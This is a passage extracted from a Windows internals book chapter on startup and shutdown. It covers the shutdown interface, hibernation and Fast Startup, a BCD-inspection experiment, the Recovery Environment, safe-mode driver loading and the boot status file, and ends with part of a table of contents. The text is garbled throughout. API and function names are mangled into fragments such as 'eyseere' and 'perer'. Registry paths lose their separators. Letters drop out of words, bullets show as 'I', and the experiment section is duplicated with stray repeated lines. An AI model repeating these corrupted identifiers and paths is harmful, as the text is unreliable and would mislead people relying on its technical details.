depends on whether the user specified a shutdown, a reboot, or a power down.
Modern apps all rely on the Windows Shutdown Interface (WSI) to properly shut down the sys-
tem. The WSI API still uses RPC to communicate between processes and supports the grace period.
The grace period is a mechanism by which the user is informed of an incoming shutdown, before the
shutdown actually begins. This mechanism is used even in case the system needs to install updates.
Advapi32 uses WSI to communicate with Wininit. Wininit ueues a timer, which fires at the end of the
grace period and calls Winlogon to initialize the shutdown request. Winlogon calls ns, and
the rest of the procedure is identical to the previous one. All the UWP applications (and even the new
Start menu) use the ShutdownUX module to switch off the system. ShutdownUX manages the power
transitions for UWP applications and is linked against Advapi32.dll.
Hibernation and Fast Startup
To improve the system startup time, Windows 8 introduced a new feature called Fast Startup (also
known as hybrid boot). In previous Windows editions, if the hardware supported the S4 system power-
state (see Chapter 6 of Part 1 for further details about the power manager), Windows allowed the user
to put the system in ibernation mode. To properly understand Fast Startup, a complete description of
the ibernation process is needed.
CHAPTER 12 Startup and shutdown
841
When a user or an application calls euspene API, a worker item is sent to the power man-
ager. The worker item contains all the information needed by the kernel to initialize the power state
transition. The power manager informs the prefetcher of the outstanding hibernation request and
waits for all its pending I/Os to complete. It then calls the eyseere kernel API.
eyseere is the key function that orchestrates the entire hibernation process. The
routine checks that the caller token includes the Shutdown privilege, synchronizes with the Plug and
Play manager, Registry, and power manager (in this way there is no risk that any other transactions
could interfere in the meantime), and cycles against all the loaded drivers, sending an
O Irp to each of them. In this way the power manager informs each driver that a power operation
is started, so the driver’s devices must not start any more I/O operations or take any other action that
would prevent the successful completion of the hibernation process. If one of the reuests fails (per-
haps a driver is in the middle of an important I/O), the procedure is aborted.
The power manager uses an internal routine that modifies the system boot configuration data (BCD)
to enable the Windows Resume boot application, which, as the name implies, attempts to resume the
system after the hibernation. (For further details, see the section “The Windows Boot Manager” earlier
in this chapter). The power manager
I
Opens the BCD object used to boot the system and reads the associated Windows Resume
application GUID (stored in a special unnamed BCD element that has the value 0x23000003).
I
Searches the Resume object in the BCD store, opens it, and checks its description. Writes the
device and path BCD elements, linking them to the WindowsSystem32winresume.efi file lo-
cated in the boot disk, and propagates the boot settings from the main system BCD object (like
the boot debugger options). Finally, it adds the hibernation file path and device descriptor into
filep and fileee BCD elements.
I
Updates the root Boot Manager BCD object writes the resumeobject BCD element with the
GUID of the discovered Windows Resume boot application, sets the resume element to 1, and, in
case the hibernation is used for Fast Startup, sets the hiberboot element to 1.
Next, the power manager flushes the BCD data to disk, calculates all the physical memory ranges
that need to be written into the hibernation file (a complex operation not described here), and sends a
new power IRP to each driver (O function). This time the drivers must put their de-
vice to sleep and don’t have the chance to fail the reuest and stop the hibernation process. The system
is now ready to hibernate, so the power manager starts a “sleeper” thread that has the sole purpose of
powering the machine down. It then waits for an event that will be signaled only when the resume is
completed (and the system is restarted by the user).
The sleeper thread halts all the CPUs (through DPC routines) except its own, captures the system
time, disables interrupts, and saves the CPU state. It finally invokes the power state handler routine
(implemented in the AL), which executes the ACPI machine code needed to put the entire system to
sleep and calls the routine that actually writes all the physical memory pages to disk. The sleeper thread
uses the crash dump storage driver to emit the needed low-level disk I/Os for writing the data in the
hibernation file.
842
CHAPTER 12 Startup and shutdown
The Windows Boot Manager, in its earlier boot stages, recognizes the resume BCD element (stored
in the Boot Manager BCD descriptor), opens the Windows Resume boot application BCD object, and
reads the saved hibernation data. Finally, it transfers the execution to the Windows Resume boot ap-
plication (Winresume.efi). n, the entry point routine of Winresume, reinitializes the boot library
and performs different checks on the hibernation file
I
Verifies that the file has been written by the same executing processor architecture
I
Checks whether a valid page file exists and has the correct size
I
Checks whether the firmware has reported some hardware configuration changes (through the
FADT and FACS ACPI tables)
I
Checks the hibernation file integrity
If one of these checks fails, Winresume ends the execution and returns control to the Boot Manager,
which discards the hibernation file and restarts a standard cold boot. On the other hand, if all the previ-
ous checks pass, Winresume reads the hibernation file (using the UEFI boot library) and restores all the
saved physical pages contents. Next, it rebuilds the needed page tables and memory data structures,
copies the needed information to the OS context, and finally transfers the execution to the Windows ker-
nel, restoring the original CPU context. The Windows kernel code restarts from the same power manager
sleeper thread that originally hibernated the system. The power manager reenables interrupts and thaws
all the other system CPUs. It then updates the system time, reading it from the CMOS, rebases all the
system timers (and watchdogs), and sends another O Irp to each system driver, asking
them to restart their devices. It finally restarts the prefetcher and sends it the boot loader log for further
processing. The system is now fully functional the system power state is S0 (fully on).
Fast Startup is a technology that’s implemented using hibernation. When an application passes
the O flag to the ns API or when a user clicks the Shutdown
start menu button, if the system supports the S4 (hibernation) power state and has a hibernation file
enabled, it starts a hybrid shutdown. After Csrss has switched off all the interactive session processes,
session 0 services, and COM servers (see the Shutdown section for all the details about the actual
shutdown process), Winlogon detects that the shutdown request has the Hybrid flag set, and, instead
of waking up the shutdown code of Winint, it goes into a different route. The new Winlogon state
uses the ernrn system API to switch off the monitor it next informs LogonUI about the
outstanding hybrid shutdown, and finally calls the nleern API, asking for a system
hibernation. The procedure from now on is the same as the system hibernation.
CHAPTER 12 Startup and shutdown
843
EXPERIMENT: Understanding hybrid shutdown
ou can see the effects of a hybrid shutdown by manually mounting the BCD store after the system
has been switched off, using an external OS. First, make sure that your system has Fast Startup
enabled. To do this, type Control Panel in the Start menu search box, select System and Security,
and then select Power Options. After clicking Choose What The Power Button does, located in
the upper-left side of the Power Options window, the following screen should appear
As shown in the figure, make sure that the Turn On Fast Startup option is selected.
Otherwise, your system will perform a standard shutdown. You can shut down your workstation
using the power button located in the left side of the Start menu. Before the computer shuts
down, you should insert a DVD or USB flash drive that contains the external OS (a copy of a live
Linux should work well). For this experiment, you can’t use the Windows Setup Program (or any
WinRE based environments) because the setup procedure clears all the hibernation data before
mounting the system volume.
EXPERIMENT: Understanding hybrid shutdown
ou can see the effects of a hybrid shutdown by manually mounting the BCD store after the system
has been switched off, using an external OS. First, make sure that your system has Fast Startup
enabled. To do this, type Control Panel in the Start menu search box, select System and Security,
System and Security,
System and Security
and then select Power Options. After clicking Choose What The Power Button does, located in
the upper-left side of the Power Options window, the following screen should appear
As shown in the figure, make sure that the Turn On Fast Startup option is selected.
Otherwise, your system will perform a standard shutdown. You can shut down your workstation
using the power button located in the left side of the Start menu. Before the computer shuts
down, you should insert a DVD or USB flash drive that contains the external OS (a copy of a live
Linux should work well). For this experiment, you can’t use the Windows Setup Program (or any
WinRE based environments) because the setup procedure clears all the hibernation data before
mounting the system volume.
844
CHAPTER 12 Startup and shutdown
When you switch on the workstation, perform the boot from an external DVD or USB drive.
This procedure varies between different PC manufacturers and usually reuires accessing the
BIOS interface. For instructions on accessing the BIOS and performing the boot from an external
drive, check your workstation’s user manual. (For example, in the Surface Pro and Surface Book
laptops, usually it’s sufficient to press and hold the Volume Up button before pushing and releas-
ing the Power button for entering the BIOS configuration.) When the new OS is ready, mount
the main UEFI system partition with a partitioning tool (depending on the OS type). We don’t
describe this procedure. After the system partition has been correctly mounted, copy the system
Boot Configuration Data file, located in EFIMicrosoft BootBCD, to an external drive (or in the
same USB flash drive used for booting). Then you can restart your PC and wait for Windows to
resume from hibernation.
After your PC restarts, run the Registry Editor and open the root O
registry key. Then from the File menu, select Load Hive. Browse for your saved BCD file, select
Open, and assign the BCD key name for the new loaded hive. Now you should identify the main
Boot Manager BCD object. In all Windows systems, this root BCD object has the 9DEA862C-
5CDD-4E70-ACC1-F32B344D4795 GUID. Open the relative key and its leens subkey. If the
system has been correctly switched off with a hybrid shutdown, you should see the resume and
hiberboot BCD elements (the corresponding keys names are 26000005 and 26000025 see Table
12-2 for further details) with their leen registry value set to 1.
To properly locate the BCD element that corresponds to your Windows Installation, use the
displayorder element (key named 24000001), which lists all the installed OS boot entries. In
the leen registry value, there is a list of all the GUIDs of the BCD objects that describe the
installed operating systems loaders. Check the BCD object that describes the Windows Resume
application, reading the GUID value of the resumeobject BCD element (which corresponds to the
23000006 key). The BCD object with this GUID includes the hibernation file path into the filepath
element, which corresponds to the key named 22000002.
When you switch on the workstation, perform the boot from an external DVD or USB drive.
This procedure varies between different PC manufacturers and usually reuires accessing the
BIOS interface. For instructions on accessing the BIOS and performing the boot from an external
drive, check your workstation’s user manual. (For example, in the Surface Pro and Surface Book
laptops, usually it’s sufficient to press and hold the Volume Up button before pushing and releas-
ing the Power button for entering the BIOS configuration.) When the new OS is ready, mount
the main UEFI system partition with a partitioning tool (depending on the OS type). We don’t
describe this procedure. After the system partition has been correctly mounted, copy the system
Boot Configuration Data file, located in EFIMicrosoftBootBCD, to an external drive (or in the
same USB flash drive used for booting). Then you can restart your PC and wait for Windows to
resume from hibernation.
After your PC restarts, run the Registry Editor and open the root O
registry key. Then from the File menu, select Load Hive. Browse for your saved BCD file, select
Open, and assign the BCD key name for the new loaded hive. Now you should identify the main
Boot Manager BCD object. In all Windows systems, this root BCD object has the 9DEA862C-
5CDD-4E70-ACC1-F32B344D4795 GUID. Open the relative key and its leens subkey. If the
system has been correctly switched off with a hybrid shutdown, you should see the resume and
hiberboot BCD elements (the corresponding keys names are 26000005 and 26000025 see Table
hiberboot BCD elements (the corresponding keys names are 26000005 and 26000025 see Table
hiberboot
12-2 for further details) with their leen registry value set to 1.
leen registry value set to 1.
leen
To properly locate the BCD element that corresponds to your Windows Installation, use the
displayorder element (key named 24000001), which lists all the installed OS boot entries. In
displayorder element (key named 24000001), which lists all the installed OS boot entries. In
displayorder
the leen registry value, there is a list of all the GUIDs of the BCD objects that describe the
leen registry value, there is a list of all the GUIDs of the BCD objects that describe the
leen
installed operating systems loaders. Check the BCD object that describes the Windows Resume
application, reading the GUID value of the resumeobject BCD element (which corresponds to the
resumeobject BCD element (which corresponds to the
resumeobject
23000006 key). The BCD object with this GUID includes the hibernation file path into the filepath
element, which corresponds to the key named 22000002.
CHAPTER 12 Startup and shutdown
845
Windows Recovery Environment (WinRE)
The Windows Recovery Environment provides an assortment of tools and automated repair technolo-
gies to fix the most common startup problems. It includes six main tools
I
System Restore Allows restoring to a previous restore point in cases in which you can’t boot
the Windows installation to do so, even in safe mode.
I
System mage Recover Called Complete PC Restore or Automated System Recovery (ASR) in
previous versions of Windows, this restores a Windows installation from a complete backup, not
just from a system restore point, which might not contain all damaged files and lost data.
I
Startup Repair An automated tool that detects the most common Windows startup prob-
lems and automatically attempts to repair them.
I
PC Reset A tool that removes all the applications and drivers that don’t belong to the stan-
dard Windows installation, restores all the settings to their default, and brings back Windows to
its original state after the installation. The user can choose to maintain all personal data files or
remove everything. In the latter case, Windows will be automatically reinstalled from scratch.
I
Command Prompt For cases where troubleshooting or repair reuires manual intervention
(such as copying files from another drive or manipulating the BCD), you can use the command
prompt to have a full Windows shell that can launch almost any Windows program (as long as
the reuired dependencies can be satisfied)unlike the Recovery Console on earlier versions of
Windows, which only supported a limited set of specialized commands.
I
Windows emory iagnostic Tool Performs memory diagnostic tests that check for signs
of faulty RAM. Faulty RAM can be the reason for random kernel and application crashes and
erratic system behavior.
When you boot a system from the Windows DVD or boot disks, Windows Setup gives you the choice
of installing Windows or repairing an existing installation. If you choose to repair an installation, the
system displays a screen similar to the modern boot menu (shown in Figure 12-15), which provides dif-
ferent choices.
The user can select to boot from another device, use a different OS (if correctly registered in the
system BCD store), or choose a recovery tool. All the described recovery tools (except for the Memory
Diagnostic Tool) are located in the Troubleshoot section.
The Windows setup application also installs WinRE to a recovery partition on a clean system installa-
tion. ou can access WinRE by keeping the Shift key pressed when rebooting the computer through the
relative shutdown button located in the Start menu. If the system uses the Legacy Boot menu, WinRE
can be started using the F8 key to access advanced boot options during Bootmgr execution. If you see
the Repair our Computer option, your machine has a local hard disk copy. Additionally, if your system
failed to boot as the result of damaged files or for any other reason that Winload can understand, it in-
structs Bootmgr to automatically start WinRE at the next reboot cycle. Instead of the dialog box shown
in Figure 12-15, the recovery environment automatically launches the Startup Repair tool, shown in
Figure 12-16.
846
CHAPTER 12 Startup and shutdown
FIGURE 12-15 The Windows Recovery Environment startup screen.
FIGURE 12-16 The Startup Recovery tool.
At the end of the scan and repair cycle, the tool automatically attempts to fix any damage found,
including replacing system files from the installation media. If the Startup Repair tool cannot automati-
cally fix the damage, you get a chance to try other methods, and the System Recovery Options dialog
box is displayed again.
The Windows Memory Diagnostics Tool can be launched from a working system or from a
Command Prompt opened in WinRE using the mdsched.exe executable. The tool asks the user if they
want to reboot the computer to run the test. If the system uses the Legacy Boot menu, the Memory
Diagnostics Tool can be executed using the Tab key to navigate to the Tools section.
CHAPTER 12 Startup and shutdown
847
Safe mode
Perhaps the most common reason Windows systems become unbootable is that a device driver crashes
the machine during the boot seuence. Because software or hardware configurations can change over
time, latent bugs can surface in drivers at any time. Windows offers a way for an administrator to attack
the problem booting in see. Safe mode is a boot configuration that consists of the minimal set
of device drivers and services. By relying on only the drivers and services that are necessary for boot-
ing, Windows avoids loading third-party and other nonessential drivers that might crash.
There are different ways to enter safe mode
I
Boot the system in WinRE and select Startup Settings in the Advanced options (see
Figure 12-17).
FIGURE 12-17 The Startup Settings screen, in which the user can select three different kinds of safe mode.
I
In multi-boot environments, select hange eaults r hoose ther ptions in the modern
boot menu and go to the Troubleshoot section to select the Startup Settings button as in the
previous case.
I
If your system uses the Legacy Boot menu, press the F8 key to enter the Advanced Boot
Options menu.
848
CHAPTER 12 Startup and shutdown
ou typically choose from three safe-mode variations Safe mode, Safe mode with networking, and
Safe mode with command prompt. Standard safe mode includes the minimum number of device driv-
ers and services necessary to boot successfully. Networking-enabled safe mode adds network drivers and
services to the drivers and services that standard safe mode includes. Finally, safe mode with command
prompt is identical to standard safe mode except that Windows runs the Command Prompt application
(Cmd.exe) instead of Windows Explorer as the shell when the system enables GUI mode.
Windows includes a fourth safe modeDirectory Services Restore modewhich is different from
the standard and networking-enabled safe modes. ou use Directory Services Restore mode to boot
the system into a mode where the Active Directory service of a domain controller is offline and un-
opened. This allows you to perform repair operations on the database or restore it from backup media.
All drivers and services, with the exception of the Active Directory service, load during a Directory
Services Restore mode boot. In cases when you can’t log on to a system because of Active Directory
database corruption, this mode enables you to repair the corruption.
Driver loading in safe mode
ow does Windows know which device drivers and services are part of standard and networking-
enabled safe mode The answer lies in the KLMSSTEMCurrentControlSetControlSafeBoot regis-
try key. This key contains the Minimal and Network subkeys. Each subkey contains more subkeys that
specify the names of device drivers or services or of groups of drivers. For example, the ssplysys
subkey identifies the Basic display device driver that the startup configuration includes. The Basic
display driver provides basic graphics services for any PC-compatible display adapter. The system uses
this driver as the safe-mode display driver in lieu of a driver that might take advantage of an adapter’s
advanced hardware features but that might also prevent the system from booting. Each subkey under
the SafeBoot key has a default value that describes what the subkey identifies the ssplysys
subkey’s default value is Driver.
The Boot file system subkey has as its default value Driver Group. When developers design a device
driver’s installation script (.inf file), they can specify that the device driver belongs to a driver group. The
driver groups that a system defines are listed in the List value of the KLMSSTEMCurrentControlSet
ControlServiceGroupOrder key. A developer specifies a driver as a member of a group to indicate to
Windows at what point during the boot process the driver should start. The ererupOrer key’s
primary purpose is to define the order in which driver groups load some driver types must load either
before or after other driver types. The Group value beneath a driver’s configuration registry key associ-
ates the driver with a group.
Driver and service configuration keys reside beneath KLMSSTEMCurrentControlSetServices.
If you look under this key, you’ll find the ssply key for the basic display device driver, which you
can see in the registry is a member of the Video group. Any file system drivers that Windows reuires
for access to the Windows system drive are automatically loaded as if part of the Boot file system
group. Other file system drivers are part of the File System group, which the standard and networking-
enabled safe-mode configurations also include.
When you boot into a safe-mode configuration, the boot loader (Winload) passes an associated switch
to the kernel (Ntoskrnl.exe) as a command-line parameter, along with any switches you’ve specified in the
CHAPTER 12 Startup and shutdown
849
BCD for the installation you’re booting. If you boot into any safe mode, Winload sets the safeboot BCD op-
tion with a value describing the type of safe mode you select. For standard safe mode, Winload sets n-
mal, and for networking-enabled safe mode, it adds ner. Winload adds nl and sets lernesell
for safe mode with command prompt and dsrepair for Directory Services Restore mode.
Note An exception exists regarding the drivers that safe mode excludes from a boot.
Winload, rather than the kernel, loads any drivers with a Start value of 0 in their registry key,
which specifies loading the drivers at boot time. Winload doesn’t check the SafeBoot registry
key because it assumes that any driver with a Start value of 0 is reuired for the system to
boot successfully. Because Winload doesn’t check the SafeBoot registry key to identify which
drivers to load, Winload loads all boot-start drivers (and later Ntoskrnl starts them).
The Windows kernel scans the boot parameters in search of the safe-mode switches at the end of
phase 1 of the boot process (senlnsr, see the Kernel initialization phase 1 section
earlier in this chapter), and sets the internal variable nee to a value that reflects the switches
it finds. During the ne function, the kernel writes the nee value to the registry
value KLMSSTEMCurrentControlSetControlSafeBootOptionOptionValue so that user-mode
components, such as the SCM, can determine what boot mode the system is in. In addition, if the system
is booting in safe mode with command prompt, the kernel sets the KLMSSTEMCurrentControlSet
Control SafeBoot OptionUseAlternateShell value to 1. The kernel records the parameters that Winload
passes to it in the value KLMSSTEMCurrentControlSetControlSystemStartOptions.
When the I/O manager kernel subsystem loads device drivers that KLMSSTEMCurrentControlSet
Services specifies, the I/O manager executes the function prer. When the Plug and Play manag-
er detects a new device and wants to dynamically load the device driver for the detected device, the Plug
and Play manager executes the function pllreree. Both these functions call the function
perer before they load the driver in uestion. perer checks the value
of nee and determines whether the driver should load. For example, if the system boots in
standard safe mode, perer looks for the driver’s group, if the driver has one, under the
nl subkey. If perer finds the driver’s group listed, perer indicates
to its caller that the driver can load. Otherwise, perer looks for the driver’s name under
the nl subkey. If the driver’s name is listed as a subkey, the driver can load. If perer
can’t find the driver group or driver name subkeys, the driver will not be loaded. If the system boots in
networking-enabled safe mode, perer performs the searches on the er subkey.
If the system doesn’t boot in safe mode, perer lets all drivers load.
Safe-mode-aware user programs
When the SCM user-mode component (which Services.exe implements) initializes during the
boot process, the SCM checks the value of KLMSSTEMCurrentControlSet ControlSafeBoot
OptionOptionValue to determine whether the system is performing a safe-mode boot. If so, the SCM
mirrors the actions of perer. Although the SCM processes the services listed under
KLM SSTEMCurrentControlSetServices, it loads only services that the appropriate safe-mode
850
CHAPTER 12 Startup and shutdown
subkey specifies by name. ou can find more information on the SCM initialization process in the sec-
tion Services in Chapter 10.
Userinit, the component that initializes a user’s environment when the user logs on (SystemRoot
System32Userinit.exe), is another user-mode component that needs to know whether the system is
booting in safe mode. It checks the value of KLMSSTEMCurrentControlSetControlSafeBoot
OptionUseAlternateShell. If this value is set, Userinit runs the program specified as the user’s shell in
the value KLMSSTEMCurrentControlSetControlSafeBootAlternateShell rather than executing
Explorer.exe. Windows writes the program name Cmd.exe to the lerneell value during installa-
tion, making the Windows command prompt the default shell for safe mode with command prompt.
Even though the command prompt is the shell, you can type Explorer.exe at the command prompt to
start Windows Explorer, and you can run any other GUI program from the command prompt as well.
ow does an application determine whether the system is booting in safe mode By calling the
Windows eyseersOO function. Batch scripts that need to perform certain
operations when the system boots in safe mode look for the OOOO environment variable
because the system defines this environment variable only when booting in safe mode.
Boot status file
Windows uses a susfile (SystemRootBootstat.dat) to record the fact that it has progressed
through various stages of the system life cycle, including boot and shutdown. This allows the Boot
Manager, Windows loader, and Startup Repair tool to detect abnormal shutdown or a failure to shut
down cleanly and offer the user recovery and diagnostic boot options, like the Windows Recovery
environment. This binary file contains information through which the system reports the success of the
following phases of the system life cycle
I
Boot
I
Shutdown and hybrid shutdown
I
Resume from hibernate or suspend
The boot status file also indicates whether a problem was detected the last time the user attempted
to boot the operating system and the recovery options shown, indicating that the user has been made
aware of the problem and taken action. Runtime Library APIs (Rtl) in Ntdll.dll contain the private inter-
faces that Windows uses to read from and write to the file. Like the BCD, it cannot be edited by users.
Conclusion
In this chapter, we examined the detailed steps involved in starting and shutting down Windows (both
normally and in error cases). A lot of new security technologies have been designed and implemented
with the goal of keeping the system safe even in its earlier startup stages and rendering it immune
from a variety of external attacks. We examined the overall structure of Windows and the core system
mechanisms that get the system going, keep it running, and eventually shut it down, even in a fast way.
851
A P P E N D I X
Contents of Windows Internals,
Seventh Edition, Part 1
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xi
Chapter 1
Concepts and tools
1
Windows operating system versions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Windows 10 and future Windows versions . . . . . . . . . . . . . . . . . . . . . . . . 3
Windows 10 and OneCore . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Foundation concepts and terms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Windows API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Services, functions, and routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .20
Virtual memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Kernel mode vs. user mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23
Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29
Terminal Services and multiple sessions . . . . . . . . . . . . . . . . . . . . . . . . . .29
Objects and handles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .33
Digging into Windows internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Performance Monitor and Resource Monitor . . . . . . . . . . . . . . . . . . . . .36
Kernel debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .38
Windows Software Development Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
Windows Driver Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
Sysinternals tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
852
Contents of Windows Internals, Part 1, 7th Edition
Chapter 2
System architecture
45
Requirements and design goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45
Operating system model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .46
Architecture overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Portability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .50
Symmetric multiprocessing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Scalability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .53
Differences between client and server versions . . . . . . . . . . . . . . . . . . .54
Checked build . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Virtualization-based security architecture overview . . . . . . . . . . . . . . . . . . . . 59
Key system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Environment subsystems and subsystem DLLs . . . . . . . . . . . . . . . . . . . .62
Other subsystems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .68
Executive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
Hardware abstraction layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .82
System processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .99
Chapter 3
Processes and jobs
101
Creating a process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .101
CreateProcess* functions arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Creating Windows modern processes . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Creating other kinds of processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .104
Process internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Protected processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
Protected Process Light (PPL) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Third-party PPL support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Minimal and Pico processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Minimal processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Pico processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Trustlets (secure processes). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Trustlet structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Contents of Windows Internals, Part 1, 7th Edition
853
Trustlet policy metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
Trustlet attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
System built-in Trustlets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Trustlet identity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
Isolated user-mode services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Trustlet-accessible system calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Flow of CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Stage 1 Converting and validating parameters and flags . . . . . . . . . 131
Stage 2: Opening the image to be executed . . . . . . . . . . . . . . . . . . . . . 135
Stage 3: Creating the Windows executive process object . . . . . . . . . 138
Stage 4: Creating the initial thread and its stack and context . . . . .144
Stage 5 Performing Windows subsystem–specific initialization . . 146
Stage 6: Starting execution of the initial thread . . . . . . . . . . . . . . . . . . 148
Stage 7: Performing process initialization in the context
of the new process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Terminating a process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Image loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Early process initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
DLL name resolution and redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
Loaded module database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .164
Import parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
Post-import process initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
SwitchBack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
API Sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Job limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Working with a job . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Nested jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Windows containers (server silos) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Chapter 4
Threads
193
Creating threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Thread internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
854
Contents of Windows Internals, Part 1, 7th Edition
Data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Birth of a thread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .206
Examining thread activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .207
Limitations on protected process threads . . . . . . . . . . . . . . . . . . . . . . . 212
